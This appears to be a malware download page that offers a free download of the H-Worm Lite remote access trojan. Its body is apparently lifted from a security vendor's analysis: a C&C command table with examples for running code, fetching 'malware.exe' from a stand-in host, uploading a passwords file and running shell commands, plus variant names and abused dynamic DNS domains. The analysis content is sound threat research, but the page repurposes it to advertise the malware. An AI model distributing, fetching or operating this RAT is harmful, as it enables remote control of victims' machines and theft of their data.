• Version 1.0.9
  • Download 1551
  • File Size 0.00 KB
  • Create Date July 25, 2020

H-Worm Lite Version Free Download || H-Worm is a VBS (Visual Basic Script) based RAT which we believe is derived off the njRAT source code. H-Worm provides cyber-criminals similar controls to njRAT. It also uses dynamic DNS for its C&C servers but unlike njRAT it uses POST requests and the HTTP User-Agent field to exfiltrate sensitive information from the infected machine.

The C&C communication POST requests typically uses parameters 'cmd' and 'param' as seen in the table below:

H-Worm Bot Command Summary
Bot Command Description Example Connection URI
execute Execute vb code sent in response execute<|>vbscript code None
update Update bot code to provided code (overwrites existing file) update<|>new vbscript bot code None
uninstall Removes the bot from the victim machine uninstall None
send Downloads content from a URL and dumps at a directory send<|>http://www.example.com/malware.exe<|>c: None
site-send Downloads content from a URL and saves with specified nam site-send<|>http://www.example.com/script.vbs<|>c:script.vbs None
recv Uploads a file to the C2 domain recv<|>C:UsersUserDocumentspasswords.txt POST /is-recving
enum-driver Sends information on the victim's system drives enum-driver POST /is-enum-driver
enum-faf Sends a directory listing for a given path enum-faf<|>C:UsersUser POST /is-enum-path
enum-process Sends the process listing of the victim's system enum-process POST /is-enum-process
cmd-shell Run a command via '%comspec% /c' on the infected host cmd-shell<|>calc.exe POST /is-cmd-shell
delete Deletes a specified file or folder from the victim's system delete<|>C:UsersUserDocuments None
exit-process Kills the specified process ID via taskkill exit-process<|>123 None
sleep Sets the number of milliseconds to sleep between 'ready' beacons (default 5000) sleep<|>10000 None
The C&C callback from an infected system includes following information in the User-Agent field:
  • Bot identifier (based off configurable string in builder & volume serial number)
  • Computer name
  • Username
  • Operating system information
  • Bot version
  • Antivirus information (Default value 'nan-av')
  • USB spreading [true/false] with date obtained from bot's registry entry.
Below are some screenshots of H-Worm's control panel accessible to the attacker, from two different variants:
H-Worm Lite Version Free Download
H-Worm plus version C&C control panel
H-Worm Lite Version Free Download
H-Worm control center [similar to njRAT's Manager]
H-Worm Lite Version Free Download
H-Worm plus version builder panel
H-Worm Lite Version Free Download
H-Worm extended/lite version C&C control panel

We continue to see many new variants of H-Worm popping up in the wild. Below are the version strings from some of the active H-Worm variants we have been tracking in 2015:

  • 2.0
  • 3az version
  • hello
  • KKMM NICE PC
  • mod version
  • plus
  • POUSSIN
  • safa7_22
  • SKY ESP PC
  • spupdate
  • the KR.joker worm
  • underworld final
  • v1.8.3  By AB DELL
  • v1.8.7  By AB DELL
  • worm Of Dz-47
  • WORM OF DZ-47

Below is the Geo distribution of the active Command & Control servers we have oberved thus far in 2015:

H-Worm Lite Version Free Download

One of the most popular features of this RAT family is the usage of Dynamic DNS for its Command & Control server communication. We have seen multiple sub-domains from the following Dynamic DNS domains in 2015 being abused by the malware authors for C&C communication:

  • adultdns.net
  • cable-modem.org
  • dz47.cf
  • ddns.net
  • dnsd.info
  • dvr-ddns.com
  • dyndns.org
  • dynu.net
  • ftp21.net
  • mooo.com
  • myq-see.com
  • no-ip.biz
  • noip.me
  • no-ip.org
  • redirectme.net
  • sells-it.net
  • servecounterstrike.com
  • serveftp.com
  • servehttp.com
  • servequake.com
  • sytes.net
  • user32.com
  • zapto.org

Conclusion

njRAT & H-Worm variant infections continue to rise, and while this threat is reportedly more prevalent in the Middle-East region, we continue to see infections in other parts of the world as well. Despite Microsoft's attempts to disrupt the C&C channel for this notorious RAT back in June 2014, we continue to see the usage of various dynamic DNS services by the malware authors for it's C&C server communication. It remains one of the most popular and prevalent RATs in the wild today.

 

H-Worm Lite Version Free Download